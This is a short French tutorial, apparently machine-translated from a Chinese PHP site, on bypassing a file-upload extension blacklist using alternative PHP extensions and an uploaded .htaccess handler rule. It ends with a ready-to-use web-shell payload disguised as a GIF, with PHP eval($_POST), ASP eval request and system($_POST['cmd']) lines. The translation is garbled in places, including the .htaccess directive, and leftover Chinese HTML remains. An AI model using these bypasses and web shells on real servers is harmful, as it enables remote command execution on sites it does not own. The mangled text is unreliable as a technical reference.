Comment contourner la liste noire lors du téléchargement de fichiers

Cet article présente principalement la méthode pour contourner la liste noire en téléchargeant des fichiers. Il a une certaine valeur de référence. Maintenant, je le partage avec vous. Les amis dans le besoin peuvent s'y référer

Ce niveau consiste principalement à définir le téléchargement. suffixe. , restreignant les suffixes tels que asp, php, jsp, etc., et le téléchargement n'est pas autorisé.

Position 1 : Cette méthode de contournement consiste à modifier le suffixe en .php3, php5, etc. Voici la vérification de la liste noire ('.asp', '.aspx', '.php', '.jsp' ) , nous pouvons télécharger php3, php5... et d'autres noms de suffixes qui peuvent être analysés par le serveur

Position 2 : Réécrire les règles d'analyse des fichiers pour contourner

1. Téléchargez d'abord un fichier nommé .htaccess avec le contenu suivant :

Application SetHandler /x-httpd-php

2. Téléchargez le script 1.jpg

contenu :

GIF89a
<?php eval($_POST[&#39;joker&#39;]);?>
<%eval request("joker")%>
<?php system($_POST[&#39;cmd&#39;]);?>

<span   style="max-width:90%"><br/>最后查看结果如下：<br/><img src="https://img.php.cn/upload/article/000/000/009/8c177c6b99f31ac79c542a12d4053de9-3.png" alt=""/><br/></span>

Ce qui précède est l'intégralité du contenu de cet article, j'espère que ce sera le cas. être utile à l'étude de chacun. Plus Pour plus de contenu connexe, veuillez faire attention au site Web PHP chinois !

Recommandations associées :

PHP utilise Azure Storage Blob pour télécharger des fichiers

Introduction à la mise en cache Nginx Memcache

Ce qui précède est le contenu détaillé de. pour plus d'informations, suivez d'autres articles connexes sur le site Web de PHP en chinois!